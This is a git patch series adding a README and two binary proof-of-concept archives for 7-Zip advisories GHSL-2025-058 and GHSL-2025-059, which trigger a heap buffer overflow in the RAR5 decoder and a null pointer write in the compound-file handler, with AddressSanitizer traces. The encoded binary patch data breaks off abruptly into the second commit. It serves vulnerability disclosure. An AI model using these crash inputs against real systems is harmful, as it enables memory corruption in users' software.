From d0bf0ac880b54fca5d63e311761ccc232d2793cf Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?=
Date: Fri, 24 Oct 2025 19:22:53 +0000
Subject: [PATCH 1/2] 7-zip PoCs

---
 SecurityExploits/7-Zip/README.md | 36 ++++++++++++++++++++++
 SecurityExploits/7-Zip/compound-crash.poc | Bin 0 -> 24663 bytes
 SecurityExploits/7-Zip/rar-crash.rar5 | Bin 0 -> 55269 bytes
 3 files changed, 36 insertions(+)
 create mode 100644 SecurityExploits/7-Zip/README.md
 create mode 100644 SecurityExploits/7-Zip/compound-crash.poc
 create mode 100644 SecurityExploits/7-Zip/rar-crash.rar5

diff --git a/SecurityExploits/7-Zip/README.md b/SecurityExploits/7-Zip/README.md
new file mode 100644
index 0000000..7456d00
--- /dev/null
+++ b/SecurityExploits/7-Zip/README.md
@@ -0,0 +1,36 @@
+# The directory contains proof of concept for GHSL-2025-058 (CVE-2025-53816) and GHSL-2025-059 (CVE-2025-53817) advisories.
+
+## GHSL-2025-058 (CVE-2025-53816)
+
+The `rar-crash.rar5` triggers heap buffer write overflow when 7zz 24.09 is compiled with ASAN and extracted, for example as `7zz e -so rar-crash.rar5`. On Windows the same PoC was tested to crash 7-Zip 24.09 even without ASAN. [The advisory](https://securitylab.github.com/advisories/GHSL-2025-058_7-Zip/).
+
+```
+==2188082==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc75fbcc844 at pc 0x5567af835070 bp 0x7fff7f71ce30 sp 0x7fff7f71c600
+WRITE of size 9469 at 0x7fc75fbcc844 thread T0
+ #0 0x5567af83506f in __asan_memset /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:67:3
+ #1 0x5567b0167b0c in My_ZeroMemory(void*, unsigned long) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Compress/Rar5Decoder.cpp:63:5
+ #2 0x5567b017c257 in NCompress::NRar5::CDecoder::Code(ISequentialInStream*, ISequentialOutStream*, unsigned long const*, unsigned long const*, ICompressProgressInfo*) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Compress/Rar5Decoder.cpp:1905:11
+ #3 0x5567aff075c0 in NArchive::NRar5::CUnpacker::Code(NArchive::NRar5::CItem const&, NArchive::NRar5::CItem const&, unsigned long, ISequentialInStream*, ISequentialOutStream*, ICompressProgressInfo*, bool&) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Archive/Rar/Rar5Handler.cpp:1165:24
+ #4 0x5567aff24721 in NArchive::NRar5::CHandler::Extract(unsigned int const*, unsigned int, int, IArchiveExtractCallback*) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Archive/Rar/Rar5Handler.cpp:3293:25
+ #5 0x5567b0244c0b in DecompressArchive(CCodecs*, CArchiveLink const&, unsigned long, NWildcard::CCensorNode const&, CExtractOptions const&, bool, IExtractCallbackUI*, IFolderArchiveExtractCallback*, CArchiveExtractCallback*, UString&, unsigned long&) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Common/Extract.cpp:235:23
+ #6 0x5567b023fe41 in Extract(CCodecs*, CObjectVector const&, CRecordVector const&, CObjectVector&, CObjectVector&, NWildcard::CCensorNode const&, CExtractOptions const&, IOpenCallbackUI*, IExtractCallbackUI*, IFolderArchiveExtractCallback*, IHashCalc*, UString&, CDecompressStat&) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Common/Extract.cpp:542:5
+ #7 0x5567b02f9d8a in Main2(int, char**) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Console/Main.cpp:1378:21
+ #8 0x5567b0305b34 in main /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Console/MainAr.cpp:162:11
+```
+
+## GHSL-2025-059 (CVE-2025-53817)
+
+The `compound-crash.poc` triggers null pointer write dereference when 7zz is compiled with ASAN and extracted, for example as `7zz e -so compound-crash.poc`. On Windows the same PoC was tested to crash 7-Zip 24.09 even without ASAN. [The advisory](https://securitylab.github.com/advisories/GHSL-2025-059_7-Zip/).
+
+```
+==2387581==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x5615317c0993 bp 0x7ffcb31a1350 sp 0x7ffcb31a1300 T0)
+==2387581==The signal is caused by a WRITE memory access.
+==2387581==Hint: address points to the zero page.
+ #0 0x5615317c0993 in CRecordVector::AddInReserved(unsigned int) ../../Archive/../../Common/MyVector.h:249:18
+ #1 0x5615317bfe66 in NArchive::NCom::CHandler::GetStream(unsigned int, ISequentialInStream**) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Archive/ComHandler.cpp:866:28
+ #2 0x5615317bea3d in NArchive::NCom::CHandler::Extract(unsigned int const*, unsigned int, int, IArchiveExtractCallback*) /src/7-zip/CPP/7zip/Bundles/Alone2/../../Archive/ComHandler.cpp:806:20
+ #3 0x561531e94bbb in DecompressArchive(CCodecs*, CArchiveLink const&, unsigned long, NWildcard::CCensorNode const&, CExtractOptions const&, bool, IExtractCallbackUI*, IFolderArchiveExtractCallback*, CArchiveExtractCallback*, UString&, unsigned long&) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Common/Extract.cpp:235:23
+ #4 0x561531e8fdf1 in Extract(CCodecs*, CObjectVector const&, CRecordVector const&, CObjectVector&, CObjectVector&, NWildcard::CCensorNode const&, CExtractOptions const&, IOpenCallbackUI*, IExtractCallbackUI*, IFolderArchiveExtractCallback*, IHashCalc*, UString&, CDecompressStat&) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Common/Extract.cpp:542:5
+ #5 0x561531f49d3a in Main2(int, char**) /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Console/Main.cpp:1378:21
+ #6 0x561531f55ae4 in main /src/7-zip/CPP/7zip/Bundles/Alone2/../../UI/Console/MainAr.cpp:162:11
+```
\ No newline at end of file
diff --git a/SecurityExploits/7-Zip/compound-crash.poc b/SecurityExploits/7-Zip/compound-crash.poc new file mode 100644 index 0000000000000000000000000000000000000000..d49fa6c5fc97270f048853b8af7f95ada677638f GIT binary patch literal 24663 zcmeI4&rcIU6vt4gw$m0wD085cor1E8R3!zK6GSAKkvf)%pZ})fa&T2!H?x zfIx>4=)s13hs~&$!&&!I8FYaF2!H?x_=&)*$j~b%RH2JBZ@{$-iFVbbpbIaR>d;C9+Yk0A}{92qine*CsI^SS1YM0 z2Pq1nns-g}zHe`H@B*cJa2 zbD1 z{{@o0LkB0veuFbGxT`2`uYZ;7vJafX#(jNTThu3Sn(y77`)K?psM9GrWXFGzWGnN( z9!f;Uqc>b$cebBwpRYZefn9%4eyK`6Y=ow_V^dmQKd8t4ZDilEEj#|pq|V?Ah7#Ei zJ<+$cM>8ARxI6=Uxb4l+g|XAOHeh5P0u}694GneSiOW>tj#HeC#`12LXq`H>ZRG z2!H?xfIw3SAiSp%-ZLTp^SZP1(hlK0yu5C1c+Un$uKADvU*HM|)F*&w zl9t?N!-zD2U1>=Of&d6~9szoKZprP_bIvy%ZSO1myfQB;8I9AhPvJ#vs*>Yva!*oa zj_ijtJy9#Iq+-855NW0If=6urpGYQoua8plDH~6yxr~}yOsbDFORLMtt87{n|z+zCPXN7SZOgh=yd#_9TfHjek+nR)MVHs+@5oBPf^_uTv5eY1V`VfOip zizhPXg8lbg@t3u`zaO8>9BUtI%N)t)&05}Uk9`~Jj-q9Ad|`BDF4{C1Gq{+aDrCAk z;@nK!Gd`J{h-c&V`Odzm_hawYli}4Xh5qT1wT;45&X^CA_Xa8!Ov!>d&_Z2S(qUgzu_O(;hk8zk!QMO=a;ko1(Rvz7APjc)zA+$P+g}AYA7auK6{fX zN7k#d8gyNWK|fH2k>o6~ei(qJC9#R@->B^0dY&{#>s*68HeIj)RBQD>(%Jw1ZXc#j zM3KFKrd41V=m$B&q)}b%E;bF-^i!zUS$D244Oi;T8XeA?bPYTuCbvNN!8rx;C2#7) zgWL~t3ofDhMzQNIN44BSYf&w(Q2N}dP<-DDc_a9tV=EZv;VJLH)46^U!fUC7mCncT?sm9^?A;Gkan`U5It-J|M ztLsTLuXx{Yw z?t$-dff`3kSBHe^MBZe~4Du|XLTOxu;ycsw5G9Xpxdrs)bWx3*1x#uoO3RbLq?RWg z)lrxtIppkv91qlj?{yYMHG0LZ(sHOTwDM-~nijocm0mHXNG$VnUS2}4*yewlH+}D5 z_^x44<4{G)(=fs3O-8TS_qYg&qj;#+iVHA|mM4KpxhE4AFh!DnO|&I*C?Vww^n#Fa zaBqjtLWlX43rx}AH!+V@xTa5BitSwOWr3=>}8K7mP`46^G@-|GuE zR55OeTfTQ=FOuioJO$!=T%g9$QXnCrI*~U~cYFE`;J~Cjy5$yv*VW($@B`y5aT;0B zQCjC&zI)QqoP`%f@S;eepTTnJ?2leC>I+Pfkkcqkkp%l~%a|gudIm3waKF>dQ8mc= zPB-6`IeNvkV&!R=v>NpNogAJYs3*B`VQrK!Dbx=*m9w4%(^5>zQO&bJR59*oDX8L* zP|ZUWMKzacJNqKhUeGo0J_Yio);%#WjIJl0Wtev()8D(JXxSWpKe{p(Z5m?+7xPnv zOjk#on~8hIwfrED?t}%*>tS9`N!#n(^5W&J1ghC*2dKNXJn1Y~*Eydh_k-L5^n+I3 zgr?Q?BzRIQy1|ojPs%NTX?6L5q8fKFplNXjgD{Nn45cA;7UuO>HwPNB7frt7O}V;t zC!{zTv?|7pz0g6m?Qu z>DJxIS-_+gqO?2-Olo=3Q5}VOJ; Date: Fri, 24 
Oct 2025 21:24:17 +0200
Subject: [PATCH 2/2] Update SecurityExploits/7-Zip/README.md

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
---
 SecurityExploits/7-Zip/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/SecurityExploits/7-Zip/README.md b/SecurityExploits/7-Zip/README.md
index 7456d00..915716c 100644
--- a/SecurityExploits/7-Zip/README.md
+++ b/SecurityExploits/7-Zip/README.md
@@ -1,4 +1,4 @@
-# The directory contains proof of concept for GHSL-2025-058 (CVE-2025-53816) and GHSL-2025-059 (CVE-2025-53817) advisories.
+# This directory contains proof of concept for GHSL-2025-058 (CVE-2025-53816) and GHSL-2025-059 (CVE-2025-53817) advisories.
 
 ## GHSL-2025-058 (CVE-2025-53816)